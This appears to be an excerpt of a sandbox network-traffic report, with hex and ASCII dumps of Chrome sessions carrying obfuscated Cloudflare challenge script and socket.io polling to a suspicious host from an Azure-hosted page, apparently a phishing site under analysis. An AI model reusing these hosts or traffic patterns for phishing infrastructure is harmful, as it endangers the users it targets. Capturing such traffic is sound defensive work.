                                                                                                                                                                                                                                2024-10-03 20:57:40 UTC1369INData Raw: 72 73 65 49 6e 74 28 67 48 28 39 38 37 29 29 2f 31 31 2a 28 70 61 72 73 65 49 6e 74 28 67 48 28 37 37 33 29 29 2f 31 32 29 2c 66 3d 3d 3d 64 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 37 31 37 37 38 37 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 31 31 32 32 29 5d 2c 65 4d 5b 67 49 28 39 38 33 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 49 28 35 34 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 30 29 7b 69 66 28 68 30 3d 67 49 2c 65 4d 5b 68 30 28 39 38 33 29 5d 29 72 65 74 75 72 6e 3b 65 4d 5b 68 30 28 39 38 33 29 5d 3d 21 21 5b 5d 7d 2c 65 55 3d 30 2c 65 4e 5b 67 49 28 31 33 36 31 29 5d 3d 3d 3d 67 49
                                                                                                                                                                                                                                Data Ascii: rseInt(gH(987))/11*(parseInt(gH(773))/12),f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,717787),eM=this||self,eN=eM[gI(1122)],eM[gI(983)]=![],eM[gI(542)]=function(h0){if(h0=gI,eM[h0(983)])return;eM[h0(983)]=!![]},eU=0,eN[gI(1361)]===gI
                                                                                                                                                                                                                                2024-10-03 20:57:40 UTC1369INData Raw: 6e 20 68 21 3d 3d 69 7d 2c 27 76 45 6f 67 58 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 78 48 6e 68 49 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 59 66 65 7a 71 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 43 50 52 43 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 76 74 6e 7a 77 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 65 64 63 49 73 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 65 58 66 76 55 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 44 64 67 59 74
                                                                                                                                                                                                                                Data Ascii: n h!==i},'vEogX':function(h,i){return h>i},'xHnhI':function(h,i){return h>i},'Yfezq':function(h,i){return i|h},'CPRCk':function(h,i){return h|i},'vtnzw':function(h,i){return h<<i},'edcIs':function(h,i){return i&h},'eXfvU':function(h,i){return h(i)},'DdgYt
                                                                                                                                                                                                                                2024-10-03 20:57:40 UTC1369INData Raw: 29 2c 52 3d 7b 7d 2c 52 2e 6c 3d 76 6f 69 64 20 30 2c 47 5b 51 5d 3d 52 3b 65 6c 73 65 20 66 6f 72 28 4d 3d 68 66 28 31 37 31 37 29 5b 68 66 28 35 38 38 29 5d 28 27 7c 27 29 2c 4e 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 4d 5b 4e 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 78 5b 4c 5d 3d 45 2b 2b 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 44 2d 2d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 44 3d 3d 30 26 26 28 44 3d 4d 61 74 68 5b 68 66 28 31 30 34 33 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 69 66 28 4f 62 6a 65 63 74 5b 68 66 28 31 32 36 39 29 5d 5b 68 66 28 31 31 35 34 29 5d 5b 68 66 28 36 35 31 29 5d 28 42 2c 43 29 29 7b 69 66 28 32 35 36 3e 43 5b 68 66 28 31 35 37 37 29 5d 28
                                                                                                                                                                                                                                Data Ascii: ),R={},R.l=void 0,G[Q]=R;else for(M=hf(1717)[hf(588)]('|'),N=0;!![];){switch(M[N++]){case'0':x[L]=E++;continue;case'1':D--;continue;case'2':D==0&&(D=Math[hf(1043)](2,F),F++);continue;case'3':if(Object[hf(1269)][hf(1154)][hf(651)](B,C)){if(256>C[hf(1577)](
                                                                                                                                                                                                                                2024-10-03 20:57:40 UTC1369INData Raw: 29 2c 73 3d 30 3b 31 36 3e 73 3b 48 3d 64 5b 68 66 28 31 30 37 37 29 5d 28 64 5b 68 66 28 36 34 37 29 5d 28 48 2c 31 29 2c 64 5b 68 66 28 31 36 38 39 29 5d 28 4f 2c 31 29 29 2c 49 3d 3d 6a 2d 31 3f 28 49 3d 30 2c 47 5b 68 66 28 31 37 30 39 29 5d 28 64 5b 68 66 28 38 38 33 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 44 2d 2d 2c 30 3d 3d 44 26 26 28 44 3d 4d 61 74 68 5b 68 66 28 31 30 34 33 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 64 65 6c 65 74 65 20 42 5b 43 5d 7d 65 6c 73 65 20 66 6f 72 28 4f 3d 78 5b 43 5d 2c 73 3d 30 3b 73 3c 46 3b 48 3d 48 3c 3c 31 7c 64 5b 68 66 28 31 32 31 39 29 5d 28 4f 2c 31 29 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 68 66 28 31 37 30 39 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49
                                                                                                                                                                                                                                Data Ascii: ),s=0;16>s;H=d[hf(1077)](d[hf(647)](H,1),d[hf(1689)](O,1)),I==j-1?(I=0,G[hf(1709)](d[hf(883)](o,H)),H=0):I++,O>>=1,s++);}D--,0==D&&(D=Math[hf(1043)](2,F),F++),delete B[C]}else for(O=x[C],s=0;s<F;H=H<<1|d[hf(1219)](O,1),j-1==I?(I=0,G[hf(1709)](o(H)),H=0):I
                                                                                                                                                                                                                                2024-10-03 20:57:40 UTC1369INData Raw: 68 28 4d 3d 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 69 28 31 30 34 33 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 64 5b 68 69 28 31 35 38 39 29 5d 28 46 2c 4b 29 3b 4c 3d 64 5b 68 69 28 31 31 38 37 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 28 64 5b 68 69 28 31 33 33 37 29 5d 28 30 2c 4c 29 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 73 5b 42 2b 2b 5d 3d 65 28 4a 29 2c 4d 3d 64 5b 68 69 28 37 34 35 29 5d 28 42 2c 31 29 2c 78 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 69 28 31 30 34 33 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 46 21 3d 4b 3b 4c 3d 48 26 47 2c 48 3e 3e 3d 31 2c 64 5b 68 69 28 35 36 30 29 5d
                                                                                                                                                                                                                                Data Ascii: h(M=J){case 0:for(J=0,K=Math[hi(1043)](2,8),F=1;d[hi(1589)](F,K);L=d[hi(1187)](G,H),H>>=1,H==0&&(H=j,G=o(I++)),J|=(d[hi(1337)](0,L)?1:0)*F,F<<=1);s[B++]=e(J),M=d[hi(745)](B,1),x--;break;case 1:for(J=0,K=Math[hi(1043)](2,16),F=1;F!=K;L=H&G,H>>=1,d[hi(560)]
                                                                                                                                                                                                                                2024-10-03 20:57:40 UTC1369INData Raw: 79 28 38 37 36 29 5d 5b 68 79 28 39 32 39 29 5d 7d 2c 27 2a 27 29 29 7d 2c 67 29 7d 2c 65 4d 5b 67 49 28 31 38 37 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 68 7a 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 29 7b 6b 3d 28 68 7a 3d 67 49 2c 6a 3d 7b 7d 2c 6a 5b 68 7a 28 31 36 36 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 46 2c 47 29 7b 72 65 74 75 72 6e 20 46 2b 47 7d 2c 6a 5b 68 7a 28 31 32 37 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 46 2c 47 29 7b 72 65 74 75 72 6e 20 46 2b 47 7d 2c 6a 5b 68 7a 28 31 36 37 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 46 2c 47 29 7b 72 65 74 75 72 6e 20 46 2b 47 7d 2c 6a 5b 68 7a 28 31 33 37 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 46 2c 47 29 7b 72 65 74 75 72 6e 20 46 2b 47 7d 2c 6a 5b 68 7a
                                                                                                                                                                                                                                Data Ascii: y(876)][hy(929)]},'*'))},g)},eM[gI(1878)]=function(g,h,i,hz,j,k,l,m,n,o,s,x,B,C,D,E){k=(hz=gI,j={},j[hz(1665)]=function(F,G){return F+G},j[hz(1274)]=function(F,G){return F+G},j[hz(1672)]=function(F,G){return F+G},j[hz(1379)]=function(F,G){return F+G},j[hz
                                                                                                                                                                                                                                2024-10-03 20:57:40 UTC1369INData Raw: 2c 68 41 28 31 37 36 37 29 2b 65 2c 6a 5b 68 41 28 31 36 31 37 29 5d 28 68 41 28 31 30 31 35 29 2c 66 29 2c 68 41 28 31 37 36 35 29 2b 67 2c 6a 5b 68 41 28 31 36 31 37 29 5d 28 6a 5b 68 41 28 31 35 33 39 29 5d 2c 4a 53 4f 4e 5b 68 41 28 39 31 35 29 5d 28 68 29 29 5d 5b 68 41 28 31 36 32 31 29 5d 28 6a 5b 68 41 28 31 35 30 35 29 5d 29 2c 65 4d 5b 68 41 28 31 35 34 38 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 43 29 7b 68 43 3d 68 41 2c 65 4d 5b 68 43 28 31 38 37 38 29 5d 28 6d 2c 75 6e 64 65 66 69 6e 65 64 2c 68 43 28 31 34 38 32 29 29 7d 2c 31 30 29 2c 65 4d 5b 68 41 28 31 35 34 38 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 44 29 7b 68 44 3d 68 41 2c 6a 5b 68 44 28 31 34 32 34 29 5d 28 6a 5b 68 44 28 36 39 37 29 5d 2c 6a 5b 68 44 28 31 31 30 34 29 5d 29 3f 65 4d
                                                                                                                                                                                                                                Data Ascii: ,hA(1767)+e,j[hA(1617)](hA(1015),f),hA(1765)+g,j[hA(1617)](j[hA(1539)],JSON[hA(915)](h))][hA(1621)](j[hA(1505)]),eM[hA(1548)](function(hC){hC=hA,eM[hC(1878)](m,undefined,hC(1482))},10),eM[hA(1548)](function(hD){hD=hA,j[hD(1424)](j[hD(697)],j[hD(1104)])?eM
                                                                                                                                                                                                                                2024-10-03 20:57:40 UTC1369INData Raw: 5d 3d 66 59 2c 67 36 5b 67 49 28 39 36 33 29 5d 3d 66 58 2c 67 36 5b 67 49 28 36 35 38 29 5d 3d 66 6a 2c 67 36 5b 67 49 28 31 31 37 36 29 5d 3d 66 54 2c 67 36 5b 67 49 28 31 30 33 30 29 5d 3d 66 53 2c 67 36 5b 67 49 28 31 32 37 35 29 5d 3d 66 62 2c 67 36 5b 67 49 28 31 33 34 34 29 5d 3d 66 79 2c 67 36 5b 67 49 28 34 38 32 29 5d 3d 66 7a 2c 67 36 5b 67 49 28 31 31 34 39 29 5d 3d 66 4a 2c 67 36 5b 67 49 28 37 35 38 29 5d 3d 66 49 2c 67 36 5b 67 49 28 31 30 38 31 29 5d 3d 66 48 2c 67 36 5b 67 49 28 31 35 33 36 29 5d 3d 66 47 2c 67 36 5b 67 49 28 31 33 37 36 29 5d 3d 66 72 2c 67 36 5b 67 49 28 31 37 39 34 29 5d 3d 67 35 2c 67 36 5b 67 49 28 31 31 33 37 29 5d 3d 66 73 2c 67 36 5b 67 49 28 34 32 36 29 5d 3d 66 77 2c 67 36 5b 67 49 28 31 31 30 38 29 5d 3d 66 74
                                                                                                                                                                                                                                Data Ascii: ]=fY,g6[gI(963)]=fX,g6[gI(658)]=fj,g6[gI(1176)]=fT,g6[gI(1030)]=fS,g6[gI(1275)]=fb,g6[gI(1344)]=fy,g6[gI(482)]=fz,g6[gI(1149)]=fJ,g6[gI(758)]=fI,g6[gI(1081)]=fH,g6[gI(1536)]=fG,g6[gI(1376)]=fr,g6[gI(1794)]=g5,g6[gI(1137)]=fs,g6[gI(426)]=fw,g6[gI(1108)]=ft


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                134192.168.2.449896104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:42 UTC785OUTGET /cdn-cgi/challenge-platform/h/g/i/8ccfd84d0859428f/1727989054308/PhU9i5DT5iFvgSb HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/86ghn/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:42 UTC170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:42 GMT
                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                Content-Length: 61
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd897ff048c21-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:42 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 5c 00 00 00 63 08 02 00 00 00 99 a1 f0 77 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                Data Ascii: PNGIHDR\cwIDAT$IENDB`


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                135192.168.2.44989479.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:42 UTC414OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB7eU&sid=nfBwI2C7WkmjiD5NAANd HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:42 UTC207INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:42 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                2024-10-03 20:57:42 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                136192.168.2.44989579.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:42 UTC643OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB98u HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:42 UTC225INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:42 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 118
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:42 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 51 56 54 39 73 75 44 52 65 66 45 57 66 30 66 35 41 41 4e 67 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                                                                                                                                                                                                Data Ascii: 0{"sid":"QVT9suDRefEWf0f5AANg","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                137192.168.2.449897104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:42 UTC926OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/520840529:1727987471:dZM8UV-JAT2hGcuf3zG_cR0GPG48srOyHscTUzuMey8/8ccfd84d0859428f/2b545705cb2f7d9 HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Content-Length: 33057
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                CF-Challenge: 2b545705cb2f7d9
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/86ghn/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:42 UTC16384OUTData Raw: 76 5f 38 63 63 66 64 38 34 64 30 38 35 39 34 32 38 66 3d 6b 6f 74 57 51 46 50 36 65 7a 65 2d 4a 38 6d 53 4c 53 32 7a 74 2d 63 53 41 53 48 53 4a 61 57 39 66 50 49 53 61 78 53 64 50 34 4a 57 46 4b 74 39 36 50 52 53 36 56 65 33 6d 50 4c 2d 37 53 39 37 75 39 6d 53 47 57 39 6a 53 77 57 46 34 64 53 61 75 46 68 4d 6c 49 57 53 79 66 57 50 4a 74 53 55 32 57 6d 53 61 53 39 6f 53 24 34 49 6a 51 79 6d 62 72 57 6e 25 32 62 4d 53 39 6c 62 42 61 45 6d 78 33 2b 67 4d 78 57 6e 4a 65 65 53 53 30 78 53 54 76 50 75 66 57 50 54 53 32 4a 53 5a 76 65 7a 61 6a 38 50 66 69 57 74 61 2b 79 56 64 44 38 30 6b 2d 73 32 65 42 47 24 46 68 52 4a 53 59 34 75 36 32 78 7a 53 53 6f 53 24 79 33 67 52 74 75 53 34 41 6c 64 66 47 69 31 35 6d 77 75 49 32 77 77 66 79 61 70 51 36 70 52 24 6e 57 67
                                                                                                                                                                                                                                Data Ascii: v_8ccfd84d0859428f=kotWQFP6eze-J8mSLS2zt-cSASHSJaW9fPISaxSdP4JWFKt96PRS6Ve3mPL-7S97u9mSGW9jSwWF4dSauFhMlIWSyfWPJtSU2WmSaS9oS$4IjQymbrWn%2bMS9lbBaEmx3+gMxWnJeeSS0xSTvPufWPTS2JSZvezaj8PfiWta+yVdD80k-s2eBG$FhRJSY4u62xzSSoS$y3gRtuS4AldfGi15mwuI2wwfyapQ6pR$nWg
                                                                                                                                                                                                                                2024-10-03 20:57:42 UTC16384OUTData Raw: 53 46 45 75 7a 53 44 53 4a 75 50 31 68 6d 78 67 53 48 4f 2d 4f 37 53 59 4a 6e 57 50 33 53 77 53 38 78 53 66 53 59 36 39 46 50 30 78 6d 74 50 78 50 76 53 46 65 53 78 50 62 53 4a 57 6e 70 4a 68 53 5a 4a 50 65 50 78 57 5a 57 46 30 65 24 53 66 78 38 6a 53 78 53 4b 78 6e 54 57 66 53 34 78 2d 6d 50 51 53 33 53 50 64 53 2d 53 74 75 46 57 50 4e 53 66 53 33 6a 53 44 53 32 75 46 57 50 55 53 33 53 38 6d 6b 30 75 36 57 53 64 57 78 53 59 36 53 75 57 75 53 71 78 53 35 78 36 53 4c 73 2d 63 24 30 53 66 53 2d 79 53 75 53 2d 46 6e 42 24 42 6f 32 65 39 31 53 62 57 71 75 2d 51 50 63 53 37 4a 6e 6f 2d 68 6b 32 65 53 75 24 4e 53 4a 78 5a 4a 2d 6c 45 39 78 32 6f 2d 70 53 78 57 46 6a 57 6f 75 44 75 38 6d 53 66 74 78 57 2d 51 53 62 57 6d 61 2d 53 50 46 53 77 4e 64 37 53 4f 4f 4a
                                                                                                                                                                                                                                Data Ascii: SFEuzSDSJuP1hmxgSHO-O7SYJnWP3SwS8xSfSY69FP0xmtPxPvSFeSxPbSJWnpJhSZJPePxWZWF0e$Sfx8jSxSKxnTWfS4x-mPQS3SPdS-StuFWPNSfS3jSDS2uFWPUS3S8mk0u6WSdWxSY6SuWuSqxS5x6SLs-c$0SfS-ySuS-FnB$Bo2e91SbWqu-QPcS7Jno-hk2eSu$NSJxZJ-lE9x2o-pSxWFjWouDu8mSftxW-QSbWma-SPFSwNd7SOOJ
                                                                                                                                                                                                                                2024-10-03 20:57:42 UTC289OUTData Raw: 69 79 51 59 34 70 41 4c 43 30 53 71 52 54 46 72 6e 53 35 37 57 42 5a 6b 47 44 53 57 57 74 4e 57 4d 52 67 53 38 38 59 4b 30 4d 43 45 47 39 54 34 51 46 4a 62 38 64 4a 49 6a 59 6d 53 48 65 42 7a 73 37 53 34 53 6f 48 67 43 46 62 57 59 36 53 71 4b 39 4a 63 66 39 32 31 4b 53 4d 39 7a 48 2d 69 6f 66 57 32 78 63 24 75 6d 78 2d 51 79 4a 65 72 4f 67 2d 76 77 53 4a 57 6e 59 41 4f 53 53 47 55 45 4e 33 70 6f 48 30 67 4e 51 72 36 43 32 63 42 46 4a 5a 4a 2d 4e 53 77 53 44 4e 7a 79 33 45 65 71 78 53 79 4d 51 72 45 57 47 4b 75 54 53 59 36 33 62 79 73 69 78 4c 50 76 44 4d 48 38 43 5a 44 4b 38 6d 6b 6d 6d 75 2d 44 6f 41 5a 43 71 39 37 57 44 6d 50 4b 55 68 53 53 33 34 33 54 6e 51 51 6e 2b 65 63 46 57 39 4f 30 4a 57 78 53 42 4f 55 64 4a 54 72 6d 36 76 48 37 7a 63 6b 36 6f 75
                                                                                                                                                                                                                                Data Ascii: iyQY4pALC0SqRTFrnS57WBZkGDSWWtNWMRgS88YK0MCEG9T4QFJb8dJIjYmSHeBzs7S4SoHgCFbWY6SqK9Jcf921KSM9zH-iofW2xc$umx-QyJerOg-vwSJWnYAOSSGUEN3poH0gNQr6C2cBFJZJ-NSwSDNzy3EeqxSyMQrEWGKuTSY63bysixLPvDMH8CZDK8mkmmu-DoAZCq97WDmPKUhSS343TnQQn+ecFW9O0JWxSBOUdJTrm6vH7zck6ou
                                                                                                                                                                                                                                2024-10-03 20:57:43 UTC300INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:42 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 26864
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cf-chl-gen: bc83V1yT/9qYF9haO1a85DxAjgBMGcC8JWJz1ZtAJ1ySeLl1MoiOrJHThb8LVLQnb3PlphWNCs15ZT8S$4bQCwk4Bmru6GCy8
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd89abc4143da-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:43 UTC1069INData Raw: 74 4a 65 50 74 59 69 35 74 62 4a 39 6d 4b 32 30 78 72 53 47 70 5a 6d 6a 6c 4c 6d 67 76 37 71 39 70 4d 53 77 31 4b 58 48 6b 35 6d 77 74 4b 6e 50 7a 74 50 59 74 74 6e 62 35 62 44 6b 75 74 7a 56 35 4d 71 6c 32 73 6a 4c 72 4d 50 51 77 4c 33 46 30 61 2f 72 2b 4c 44 37 39 64 48 4e 79 63 7a 66 7a 67 57 2f 32 38 44 69 41 67 67 4c 79 39 76 31 43 38 2f 63 2b 52 4d 45 7a 76 44 54 36 78 4c 53 45 2f 44 61 47 50 55 4c 47 4f 37 35 2b 79 50 34 43 41 50 32 36 42 4d 69 4a 41 67 58 36 43 77 6a 48 53 49 6f 35 78 45 5a 38 51 4d 33 4e 43 33 35 4d 79 6b 62 51 44 73 57 41 67 46 44 4d 43 6c 47 4e 52 73 5a 47 55 59 47 54 7a 6f 73 42 6c 56 50 52 79 55 56 55 46 49 79 52 31 74 66 59 44 6c 4c 4d 69 34 78 55 6a 56 70 50 55 6b 34 57 7a 55 73 58 45 70 68 52 48 52 45 59 47 56 69 4e 6d 6c
